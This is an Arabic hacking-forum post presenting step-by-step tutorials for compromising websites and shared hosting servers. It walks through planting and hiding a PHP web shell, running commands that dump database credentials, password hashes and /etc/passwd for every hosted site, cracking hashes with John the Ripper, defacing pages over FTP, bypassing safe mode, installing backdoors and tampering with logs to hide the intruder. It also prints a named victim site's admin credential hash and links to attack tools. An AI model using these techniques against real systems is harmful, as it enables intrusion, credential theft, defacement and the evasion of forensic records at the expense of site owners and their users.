منتديات مودي لاختراق و الهكر
.•° أهـــلاً وســهــلاً °•.

حينما تدق الأجراس .. تنشد الأطيار لحن الخلود ..
فتعانق نسمات الصباح .. غروب الشمس ..
يتوهج البدر حاملاً معه باقات من الزهر ..
لينثرها بين الأيادي .. معلنة موعد فجر جديد
يصاحبه نور قلم فريد .. نستقبلكم والبشر مبسمناً ..
نمزجه بشذا عطرنا ..
نصافحكم والحب اكفنا .. لنهديكم أجمل معانينا ..
ونغرف من همس الكلام أعذبه .. ومن قوافي القصيد أجزله ..
ومن جميل النثر .. أروعه .. بين مد وجزر .. وفي امواج البحر ..
نخوض غمار الكلمة .. فتجرفنا سفينة الورقة .. تجدفها اقلامنا ..
لتحل قواربكم في مراسينا .. فنصل معاً نحو شواطىء اروع
فأهلا ومرحـــبا بكم أحبتنــا
إدارة المنتدى
منتديات مودي للهكر
مع تحيات / m.o.d.e-tanani@hotmail.com
منتديات مودي لاختراق و الهكر
.•° أهـــلاً وســهــلاً °•.

حينما تدق الأجراس .. تنشد الأطيار لحن الخلود ..
فتعانق نسمات الصباح .. غروب الشمس ..
يتوهج البدر حاملاً معه باقات من الزهر ..
لينثرها بين الأيادي .. معلنة موعد فجر جديد
يصاحبه نور قلم فريد .. نستقبلكم والبشر مبسمناً ..
نمزجه بشذا عطرنا ..
نصافحكم والحب اكفنا .. لنهديكم أجمل معانينا ..
ونغرف من همس الكلام أعذبه .. ومن قوافي القصيد أجزله ..
ومن جميل النثر .. أروعه .. بين مد وجزر .. وفي امواج البحر ..
نخوض غمار الكلمة .. فتجرفنا سفينة الورقة .. تجدفها اقلامنا ..
لتحل قواربكم في مراسينا .. فنصل معاً نحو شواطىء اروع
فأهلا ومرحـــبا بكم أحبتنــا
إدارة المنتدى
منتديات مودي للهكر
مع تحيات / m.o.d.e-tanani@hotmail.com
منتديات مودي لاختراق و الهكر
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات مودي لاختراق و الهكر

برامج للهكر ..&.. الاختراق
 
الرئيسيةأحدث الصورالتسجيلدخول
.•° أهـــلاً وســهــلاً °•. حينما تدق الأجراس .. تنشد الأطيار لحن الخلود .. فتعانق نسمات الصباح .. غروب الشمس .. يتوهج البدر حاملاً معه باقات من الزهر .. لينثرها بين الأيادي .. معلنة موعد فجر جديد يصاحبه نور قلم فريد .. نستقبلكم والبشر مبسمناً .. نمزجه بشذا عطرنا .. نصافحكم والحب اكفنا .. لنهديكم أجمل معانينا .. ونغرف من همس الكلام أعذبه .. ومن قوافي القصيد أجزله .. ومن جميل النثر .. أروعه .. بين مد وجزر .. وفي امواج البحر .. نخوض غمار الكلمة .. فتجرفنا سفينة الورقة .. تجدفها اقلامنا .. لتحل قواربكم في مراسينا .. فنصل معاً نحو شواطىء اروع فأهلا ومرحـــبا بكم أحبتنــا إدارة المنتدى

 

 أقوى شرح لاختراق المواقع من الصفر الى الاحتراف

اذهب الى الأسفل 
كاتب الموضوعرسالة
مودي المدير العام للمنتدي
Admin
Admin
مودي المدير العام للمنتدي


المساهمات : 114
تاريخ التسجيل : 12/07/2010
العمر : 30

أقوى شرح لاختراق المواقع من الصفر الى الاحتراف Empty
مُساهمةموضوع: أقوى شرح لاختراق المواقع من الصفر الى الاحتراف   أقوى شرح لاختراق المواقع من الصفر الى الاحتراف Icon_minitimeالإثنين يوليو 12, 2010 3:17 pm




ارجو الرد ولو بكلمة شكر

الكتاب تم تصميمة وشرحة من قبل اشخاص وهم 3 وأرجو الشكر لي ولهم



:6:اخووووووووووووووووووووووو x X x وووووووووووووووووووووكم

نبدا الشرح :::؟
بسم الله الرحمن الرحيم



سيتضمن الكتاب بعض الدرووس المنقوله من بعض خبراء اختراق المواقع وشرح بعض الادوات المساعده للاختراق





الدرس الاول

طريقه اختراق السيرفر كاملا

للكاتب : دكتور الحب

===========================

طريقة اختراق السيرفرات ..

نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي سيرفر..

وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا

قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور )) [IMG]http://www.alkaen.taqaniat.net/ShellsAlkaeN.zip[/url]
------------------------------------------------------------------------------
بسم الله نبدأ في الشرح ::--

البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))

وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..

ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell
على موقعك او الموقع الذي اخترقته..

ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..

وللتوضيح اكثر..

نفترض انك اخترقت الموقع www.USA.com وقمت بتحميل الــ phpshell
على ملف download
فسيصبح العنوان www.USA.com/download/phpshell.php

وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ

في الفراغ هذا سوف نضع فيه اوامر اللينكس..

ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--

يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..

ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي :alam 2:
لاخفاءه نسوي كذا بالطريقة هذي www.USA.com/phpshell.php wget

وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..

---------------------------------------------
ندخل الى موضوعنا

والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا www.USA.com/download/phpshell.php

وثم نجد كتابة اسمها Command وامامها فراغ

في الفراغ هذا ندخل اوامر اللينكس عليه..

وندخل الامر هذا مثلا ls /var/named
وهو لاحضار جميع المواقع التي على السيرفر..

ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---== --شرحالاوامر--==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات

نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))

1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له

اكتب هذا الامر
هذا الجزء من المحتوى مخفي
find / -name config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..

طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو www.ainvar.net والمنتدى من نوعية phpBB

المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات

روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup

-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..

اكتب امام Command في الفراغ نكتب هذا الامر
find / -name service.pwd

وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

وراح يجينا الباسورد للموقع ومشفر بمقياس DES

----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك

نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf

وراح يجينا الباسوردات لكل المواقع..

ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..

وهذه ايضا اوامر مبسطة للافادة : : - -
+++++++++++++++++++++++++++++++++
A
access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..
at : لتنفيذ امر في تاريخ ووقت معين
alarm : لعمل منبه
accept : لقبول اتصال على سوكيت .


B
batch : لتنفيذ امر عندما يحصل على تصريح
buildhash : مدقق املائي


C
cat : لعرض محتوى اكثر من ملف مع بعض
cd : لتغير الدليل الذي انت عليه
chmod : لتغير تصريح دخلول ملف معين
chown : لتغير مالك ملف معين
clear : لمسح كل الذي على الشاشة
cmp : لمقارنة ملفين
cp : لنسخ الملفات
crypt : لتشفير و فك تشفير الملفات
csplit : لتقسيم الملف الى عدة ملفات
cu : لطلب تريمنال يونكس اخر


D
date : لاظهار التاريخ و الساعة
df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )
diff : لمقارنه ملفين
diff3 : لمقارنه 3 ملفات او اكثر
dircmp : لمقارنه دليلان
du : تقرير عن مساحه القرض المستخدم


E
echo : يستخدم لاظهار سطر نكتب فيه تيكست
text editor : ed ( مثل الورد يعني )
egrep : مثل الامر grep
text editor : ex ( مثل الورد يعني )


F
file : للتقرير عن نوع ملف
find : للبحث عن ملفات
finger : تقرير عن مستخدم


G
++g : كومبيلر لل C++ و C
gcc : كومبيلر لل C++ و C
grep : يستخدم للبحث عن شئ داخل ملف
gzip : لضغط ملفات
gunzip : لضغط ملفات


H
haltsys : لاغلاق النظام
head : لاظهار اول 10 اسطر من الملف


I
ispell : مدقق املائي


K
** kill : لانهاء عمليه


L
line : لقراءة ملف سطر معين في ملف
ln : لعمل لينك ملف معين
logname : للحصول على اسم الدخول الخاص بك
lpr : ارسال طلب للطباعه
lprint : للطباعه بالطابعه المحليه
lpstat : لتقديم تقرير عن حاله الطباعه
lpq : لتقديم تقرير عن حاله الطباعه
ls : لعرض محتويات مجلد


M
mail : لارسال و استقبال ايميلات
man : للحصول على معلومات عن اي امر
mkdir : لعمل دليل جديد
more : لعرض الملفات


P
passwd : لانشاء كملة سر او تغيره
pr : لطباعه ملف
ps : العمليات عن العمليات التي تم تشغيلها
pstat : لعرض حالة النظام
pwd : لعرض المسار الذي انت فيه الان


R
rm : لمسح ملفات او مجلدات ( خاليه )
rmdir : لمسح مجلد ( خالي )
+++++++++++++++++++++++++++++++++++

جميع الحقوق محفوضه للكاتب دكتور الحب



================================================== =========================

اول درس في اختراق المواقع

للاستاذ الكبير سوبر كريستال

س1: ماهي الادوات التى تتيح لي الاختراق بسهوله ؟
س2: كيف اتعرف على نظام الموقع المراد اختراقه؟
س3: كيف اكتشف ثغرات بالموقع المراد اختراقه؟
س4: كيف اكتسب الثغره في صالحي في الاختراق؟
س5: بعد الحصول على الباسوورد مشفر ماذا افعل؟
س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ؟
س7: كيف استطيع ان ادخل على سيرفر الاستضافة عن طريق الموقع المخترق؟
س8: اذا كان بالسيرفر سيف مود (الوضع الآمن) كيف أتخطاه ؟
===S===U===P==E===R===C===R===Y===S===T===A===L==
اولا هذا ليس كل شئ في الاختراق وانما انا وضعت لكم رؤوس اقلام في مجال الاختراق وعليك انت بنفسك تكملة المشوار و هذه الدروس يحتاج لها كل مبتدئ باختراق المواقع وبعد ذالك يعتمد على نفسه .....

اولا الادوات التى تتيح لنا الاختراق وبمعنى اصح لن تستطيع ان تصبح هاكر وانت تعمل على مايكروزززززفت ويندوز
وانا انصحك قبل قرائتك الموضوع ان تذهب الى أقرب محل كمبيوتر وتشتري اسطوانات لينكس
وافضل انواع نظام اللينكس هو
المرتبة الاولى : المــاندريــك
المرتبة الثانية : الريد هات
المرتبة الثالثة : سوزي Suse
ويوجد عدة انواع ولكن انا بنفسي افضل السوزي ولكنه معقد بعض الشئ للمبتدئين

نظام لينكس يختلف عن الويندوز وشبية بنظام ليندوز
في نظام ويندوز يوجد الدوس bos وهو لتنفيذ الاوامر
وايضاء في نظام لينكس يوجد الشيل shell وهو ايضا لتنفيذ الاوامر مثل السكريبتات وترجمة لغة السي وغيرها.
يطلق على نظام لينكس المصدر المفتوح وهو قطعه مصغره من نظام يونيكس الذي يستخدم للسيرفرات وهو جدا
تاريخ اصدار لينكس هو في عام 1991 وتم اصداره كبرنامج مجاني في عام 1992


ثاني اداة هي برنامج جون ذا ريبر وهذا البرنامج لكسر الباسووردات المشفره
وسوف اشرحه فيما بعد


====S==u==p==E==r===C==r==y==s==t==a===L======
س2: كيف اتعرف على نظام الموقع المراد اختراقه؟

التعرف على نظام الموقع له عدة طرق فمنها
عن طريق التلينت..
التلينت هو نظام يوجد في الويندوز للاتصال بأجهزه بعيده
وطريقه تشغيله
اذهب الى
ابدا Start
تشغيل run
اكتب telnet
بعد ذلك إضغط على connectثم على Remote System بعد ذالك ستظهر لك شاشة صغيره
اكتب اسم الموقع بدون / او http:// بجنب Host Name
Port سوف يظهر لك خمس خيارات من بينها telnet اختارها
Term Type اتركه كما هو
واضغط موافق ==>Enter

انتظر قليلا وسوف يستخرج التلينت لك معلومات عن الموقع مثل نظامه
اذا كان يونيكس او ويندوز 2000 اباتشي او غيره

ماذا نستفيد من هذه المعلومات : الاستفاده هي اننا علمنا ان الموقع شغال على نظام Linux Apache وقد استخدم تصميم الموقع على الفرونت بيج او غيره
ويوجد طريقه ثانيه واسهل
اذهب لموقع نت كرافت www.netcraft.com اكتب عنوان الموقع المراد اختراقه بدون http او / يعنى مثلا اننا نريد اختراق موقع http://www.crystal.com
نكتب www.crystal.com


ونضغط على انتر او Lookup
بعد ذالك سوف يستخرج لك معلومات الموقع
-----------------------
Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.2 PHP/4.3.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.6b on Linux-----------------------
يظهر لنا أن ملقم الويب هو
Apache
النسخة/الإصدارة
1.3.29
مع دعم الفرونت بيج FrontPage
طبعا ثغرات الفرونت بيج كثيره جدا

والثغرات الآمنية هي اخطاء برمجية ومعروف ان شركه مايكروززززفت لاتخلوا من الاخطاء لانها شركه فاشله جدا وكل ادواتها وبرامجها معرضة للاختراق


الآن عرفنا الدعم وهو فرونت بيج

نأتى للخطوة الثانيه

==B==L==A==C==K===3==S===F===H====C==O===M=====
- r E p u S
- C r y s t a l
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=

س3: كيف اكتشف ثغرات بالموقع المراد اختراقه؟
الجواب في الخطوة الاولى تعرفنا على نظام الموقع وعرفنا ان الموقع يدعم الفرونت بيج مثلا
Ok الان اذهب لمواقع السكيورتى
او حمل أي برنامج ماسح لثغرات
مثل : Shadow Security Scanner
وانا اقول لك قبل استخدامك هذه البرنامج لاتعتمد عليه لانه سوف يستخرج لك 100000 ثغره و1 منها تفيدك و99999 لاتهم

طبعا برنامج الشادو سكان لن اشرحه هنا لانى شرحته قبل كذى في منتدى نجم دوس ## قسم الهاكرز العام ##

والان ابحث عن ثغرات الفرونت بيج عن طريق الشادو سكان او أي برنامج ماسح ثغرات او مواقع سكيورتى



%&%&%&%&%&%&%&%&%&%&%&%&%&%&%&%&

س4: كيف اكتسب الثغره في صالحي في الاختراق؟

الان اكتشفنا ثغره بالموقع
ولكن لن تفيدك اذا اضفتها للموقع هكذا ولكن يجب عليك ان تفعل مايجب فعله :
وهو ان تكون الاكسبلويت تنفيذي والحل هنا انك تنسخ الثغره وتضعها في الشيل
وسوف تكون تنفيذيه والان اكتب بعد عنوان الموقع واضافه الثغره /passwd.txt
وسوف يظهر لك اليوزرنيم والباسوود تبع الموقع مشفر هكذا xOi4i8U
وهذا موقع مخترقه انا
واعتبره فأر تجارب
http://amherstxc.aminfo.com/
وهذا اليوزرنيم والباسوورد حق الموقع
WebAdmin:aepTOqxOi4i8U


الان ماذا تفعل حتى تكسر اليوزرنيم والباسوورد وتدخل على الموقع
=-=--S=-=-u=-=-p=-=-E=-=-r=-=-C=-=-r=-=-y=-=-s=-=-T=-=-a=-=L=-

الان استخدم اداة جون ذا ريبر في كسر الباسوورد
واذا كان لايتوفر لديك هذا البرنامج
اذهب الى محرك البحث GOOGLE
واكتبjohn-16 zip
بعد تحميل اداة جون وتثبيتها ونقلها لقرص السي
اذهب الى مجلد john-16 سوف يظهر لديك مجلدين واحد بأسمrun والثاني باسم doc
يهمنا هنا مجلد run ادخل عليه وضع الباسوورد واليوزرنيم المشفر
WebAdmin:aepTOqxOi4i8U
في المفكره واحفظها باسم passwd.txt او أي اسم وضعها في مجلد run

الآن اذهب الى
ابدا start
تشغيل run
اكتب command
سوف تظهر لديك شاشة الدوس
الان اكتب
cd john
واذا ظهر لديك في شاشة الدوس
<c:\john
اكتب
cd RUN

والان اكتب
john -i:all passwd.txt
واضغط انتر
اسم المجلد الذي وضعت فيه الباسوورد =passwd

وهذه بعض اوامر اداة جون في كسر التشفير
john -i:all passwd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات

====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة

====
john -i: Digits passwd.txt
----------------------------------
يبحث عن الأرقام

====
john -single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
ويوجد اوامر اخرى
john -si passwd.txt
john -w:word.txt passwd.txt

وهذا وورد لست لتسهيل عمليه كسر الباسوورد
ftp://ftp.ox.ac.uk/pub/wordlists
ضع الوورد لست في ملف run الموجود في ملف john الخاص بالاداة
والان استخدم هذا الامر عند فك التشفير
john -w:CrystaL.txt passwd.txt
ملاحظه:
CrystaL.txt: استبدله باسم الوورد لست و passwd.txt استبدلها باسم الملف الذي وضعت به الباسوورد

والان ابدا بعملية الكسر


/\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\/\/\\//\\//\\//\\///\\//\\//\\//\\
==S==u===p==E==r===C==r==y==s==T==a==L========
/\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\/\/\\//\\//\\//\\///\\//\\//\\//\\
س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ؟
الجواب سهل جدا
اذهب الى ابدا وبعد ذالك تشغيل واكتب Command
وبعد دخولك لشاشة الدوس اكتب ftp
وبعد ذالك اكتب www.CrystaL.com
CrystaL= اسم الموقع المخترق
سوف يطلب منك كلمة المرور واسم المستخدم
وانت الان كسرت اليوزرنيم والباسوورد باداة جون يعنى انك حصلت على كلمة المرور واسم المستخدم الخاصه بالموقع والتى لاتوجد الا مع المدير Admin
وهذه هي اوامر الفتب

Is= عرض الملفات الموجوده
Get = لتحميل ملف وطريقته هكذا فرضنا ان الملف موجود بالسيرفر باسم Super لتحميل الملف اكتب هذا الامرGet Super
Sacii= لنقل ملفات الـhtml والتكست
Put = لنقل الملفات من جهاز ك لسيرفر
والطريقه هكذا فرضنا ان الملف الموجود في جهازك يحمل هذا الاسم crystal الطريقه لنقله للسيرفر هكذا
Crystal Put

نكتب اسم الملف ويليه الامر هذا put

واذا كنت من عشاق الشهره وتريد تغيير الصفحة الرئيسية الخاصه بالموقع
احفظ شعارك باسم index.html في قرص السي وانقلها للموقع عن طريق الاف تي بي

===S===U===P==E===R===C===R===Y===S===T===A===L==

س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ؟

ج6: الجواب سهل جدا الان انقل اداة الشيل اكوينت shell الى الموقع المخترق
يعنى ارفع الاداة للموقع
وبعد ذالك ادخل على صفحة الشيل التى رفعتها على الموقع المخترق ونفذ الاوامر
والسكربتات ...... ولكن !
اذا كان سيرفر الاستضافة الذي يوجد عليه الموقع المخترق محمي
ونقول بكلمة سيف مود (الوضع الآمن) وهو حجب او منع سكربتات
الــshell_exe و sytemو php وغيره
بمعنى اصح انك لاتستطيع ان تنفذ اوامر الشيل على السيرفر
لكن تخطي السيف مود وتنفيذ الاوامر
استخدام سكربتات بيرل و سي جي آي
وسأطرح هنا احد السكربتات الخبيثه
مثل سكريبت Cgicommand
ولتحميله
http://corruptcode.org/downloads/cgicommand.zip


بعد تحميله يجب تحديد المسار الافتراضي للبيرل حتى يعمل بشكل افضل :
usr/local/bin/perl
والان اذا كان نوع السيرفر المراد اختراقه ويندوز 2000
$WinNT = 0;
استبدل هذا
بــ$WinNT = 1;
اما اذا كان نوع السيرفر يونيكس فأتركه كما هو
والان نضع كلمة مرور على السكريبت
Password = " changeme";
Changeme= كلمة المرور وهذه
والان اتصل بالشيل عن طريق منفذ 22


==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
وهذه بعض اوامر الشيل هذا الامر يظهر لك المواقع واليوزنيم
cat /etc/domainalias
cat /etc/passwd
=====
وهذا الامر لعرض باسووردات المستخدمين على السيرفر
cat /home/*/public_html/_vti_pvt/service.pwd
وهذا الامر لمعرفه الباسوورد لقاعده البيانات
find / -name config.php
وهذا الامر لعرض المواقع التى على نفس السيرفر
ls /var/named
============

================================================== =========





الدرس الثاني لاختراق المواقع

للكاتب :سوبر كريستال

الدرس الثاني من اختراق المواقع(لم يشرحه اي هاكرز)


### بسم الله الرحمن الرحيم####
طبعا في درسنا السابق والذي يحمل عنوان(((اول باب لك في اختراق المواقع))
قد شرحنا هذه النقاط

س1: ماهي الادوات التى تتيح لي الاختراق بسهوله ?
س2: كيف اتعرف على نظام الموقع المراد اختراقه؟
س3: كيف اكتشف ثغرات بالموقع المراد اختراقه؟
س4: كيف اكتسب الثغره في صالحي في الاختراق؟
س5: بعد الحصول على الباسوورد مشفر ماذا افعل؟
س6: كيف ادخل على لوحة التحكم بعد الاختراق وكيف اغير الصفحة الرئيسية ?
س7: كيف استطيع ان ادخل على سيرفر الاستضافة عن طريق الموقع المخترق؟
س8: اذا كان بالسيرفر سيف مود (الوضع الآمن) كيف أتخطاه ?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&
اما في درسنا هذا فسوف نشرح هذه النقاط:-
^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&^&
SupEr-CrystaL=-=-=-=-=-=-==-=-=-=-=-=-=
[][][][][][][][CRYSTAL6.COM][][][][][][][]
[][][][][][][][CRYSTAL6.NET][][][][][][][]
77777777777777777777777777777777777
88888888888888888888888888888888888
س1:ماهو الاكسبلويت(Exploits) ?
س2: ماهو الباك دور (BackdooR) وماهي انواعة ?
س3: ماهو السنايفر(sNifer)?
س4: اللوج وتخطيه او مسحه؟
س5: ماهو السكريبت كيدز؟
س6: كيف يمكنني إختراق جميع المواقع التى علي السيرفرمرة وحدة! ؟؟

----------------^---^---^--------^---^---^----------------------
---------------~~~~~~~~~~~~~~~~~~-----------------------
ماهو الاكسبلويت(Exploits) ?
اولا الاكسبلويت هي ثغرات تنفيذيه تستطيع ان تستعرض ملفات المواقع من خلالها عن طريق المتصفح
انواع الاكسبلويتات
1- PHP Exploits
2- DOS Exploits
3- Buffer Over Flow Exploits
4- CGI Exploits
طبعا كل نوع من الاكسبلويت له طريقة عمله
بأمكانك الدخول على السيرفر عن طريق هذا الاكسبلويتات وبأمكانك التحكم بالروت حتى ولو لم تكن لديك صلاحية في ذالك !!!!!
طبعا قبل ان تبدأ في مجال الاكسبلويت يجب ان يكون لديك خلفية في لغة السي حتى تتم من ترجمتها والتعديل فيها
)()()()()()()()()()()()()()()()()()()()()()()()()(
)()()()()()()()()()()()()()()()(

س2: ماهو الباك دور (BackdooR) وماهي انواعة ?
الباك دور هو اداة تعيدك لسيرفر مع حفظ ادواتك التى استخدمتها على السيرفر
مثلا يااخوان انى كنت محمل شيل على موقع مخترق وكل يوم ارفع ملفاتى على السيرفر عن طريق الموقع المخترق
مع الوقت كشفنى صاحب السيرفر وغير الباسوورد ماذا افعل؟ مع الباك دور بأمكانك تفعل مايجب فعله
وهو انك تدخل على السيرفر حتى ولو ان الادمن غير الباسوورد بأمكانك تدخل كامستخدم روت لاتستعجل سوف تعرف كل شئ بإذن الله
وماهي انواع الباك دور ؟؟؟؟؟؟؟
هو: passive
و : Active
==-=-=-
telnetd
4- Kernel
5- Services
طبعا سوف نشرح كل نوع بالتفصيل ان شاء الله
النوع الاول هو رهيب و في نفس الوقت وأتماتيك يعنى يشتغل دايركت
النوع الثاني: سهل جدا وكثير مايستخدمه اخوانا الهاكرز في الاختراق لانه سهل جدا ويكون شغال طول الوقت وهذا هو اختلافه عن الاول
=========================================
لنفرض اننا اخترقنا السيرفر ولكن ليس بصلاحية روت يعنى كامستخدم عادي الافضل هنا اننا نستخدم هذا النوع من الباك دور passive لماذا ! ? الجواب انني شرحت انه أتماتيك يعنى يشتغل لوحدة وهذي الطريقة حلوه بما انك لست روت على السيرفر فقط استخدم هذا النوع وهو بنفسه بعد مايتم دخول الروت سوف يتم تفعيله
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^
Telnetd بأمكانك عن طريق هذا النوع من انواع الباك دور آخذ اكسس على السيرفر
وعلى مااظن ان هذه الطريقة هي التي فعلها اخونا (مارافول) في موقع نجم على حسب كلامه انه يقول آخذت اكسس على السيرفر ويقول هذي الطريقة لايعرفها احد !!! لووووووول : وهاانا اوضحها لكم هنا
نأتى في النوع الرابع وهو الكيرنلKerneL
هذا النوع واضح من اسمة وتستطيع عن طريق هذا النوع من الباك دور الدخول الى الكيرنل وتجعله يعمل في صالحك
نأتى لنوع الخامس من الباك دور وهو خدمة باك دور Services وهذا النوع بأمكانك ان تضيف خدمات لسيرفر مثل خدمة الاف تي بي اذا كان لايدعمها وغيرها وهذي الطريقه رهيبه وتعمل في صالحك
()()()()()()()()()()()()()()()()()()()()()()()()()
()()()()()()()()()()()()()()()((((
CrystaL6.CoM Super-CrystaL
()()()()()()()()()()()()()()()()()()()()()()()()()
()()()()()()()()()()()()()()()((((
س3: ماهو السنايفر(sNifer)?
الجواب هي ادوات تجسس وهي مصممة لمراقبة الباكيت الصادرة والوارته نكتفي بهذا الإجابه
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
يوجد نقطه يااخوان اضطر اني اوضحها لكم وهي((logs)) ؟؟
معناه يااخوان هو مجلد يضع فيه رقم الاي بي وهذا آخطر شئ في الإختراق من الممكن ان يكون واحد غبي يخترق موقع شركه مثلا او أي موقع ويجلس يمسح وينزل ولاينتبه لملف اللوج وعلى كذا ?ينصاد
اولا ملف اللوج ينقسم الى قسمين عندك الــerror والـــaccess وملف اللوج يأتى مع السيرفر جاهز
يعنى لاتفكر ان فيه سيرفرات مافيها ملفات لوج ((logs))
-----------------------------------
[Thu May 06 16:54:52 2004] [error] [client 127.0.0.1] File does not
exist: [url]http://www.xxxx.com/admin/image/logo.gif[/IMG]
[Thu May 06 16:54:52 2004] [error] [client 127.0.0.1] File does not
-----------------------------------------------
اكيد فهمتوا الآن مدى خطورة ملفات اللوج ((يعنى يستخرج عنك معلومات كامله وحتى بالتاريخ ))
الطريقة الافضل لتخطى ملفات اللوج ............. هو انك تغير رقم الاي بي في مجلد error وتضع رقم أي بي وهمي وليكون الــ127.0.0.1 ولكن لاتحذف الملف حتى لايشك المدير واحب اوضح شئ ثاني
بما انك مسحت ملفات اللوج تعتبر انك مسحت آثرك ..................لا
لان حتى لو تحذف ملف اللوج وترجع لصفحة الموقع المخترق او السيرفر بيرجع يوضع نفسه من جديد ملف اللوج وبرقم جهازك ولكن لاتحذف ملف اللوج الا بعد ماتنهى كل شئ يعنى ماناقص الا تمسح ملف اللوج وتطلع من الموقع ............
مجلد الــaccess
-----------------------------------
//phpmyadmin/user_details.php HTTP/1.1" 200 4069
127.0.0.1 - - [07/May/2004:16:35:45 +0300] "GET /phpmyadmin/libraries/user_details.js HTTP/1.1" 304 -
127.0.0.1 - - [07/May/2004:16:36:45 +0300] "GET /test/ HTTP/1.1" 200 1043
127.0.0.1 - - [07/May/2004:16:37:20 +0300] "GET /test/ HTTP/1.1" 200 1043
127.0.0.1 - - [07/May/2004:16:38:44 +0300] "GET /test/ HTTP/1.1" 200 /user_details.php HTTP/1.1" 200 4069
127.0.0.1 - - [07/May/2004:16:35:45 +0300] "GET /phpmyadmin/libraries/user_details.js HTTP/1.1" 304 -
127.0.0.1 - - [07/May/2004:16:36:45 +0300] "GET /test/ HTTP/1.1" 200 1043
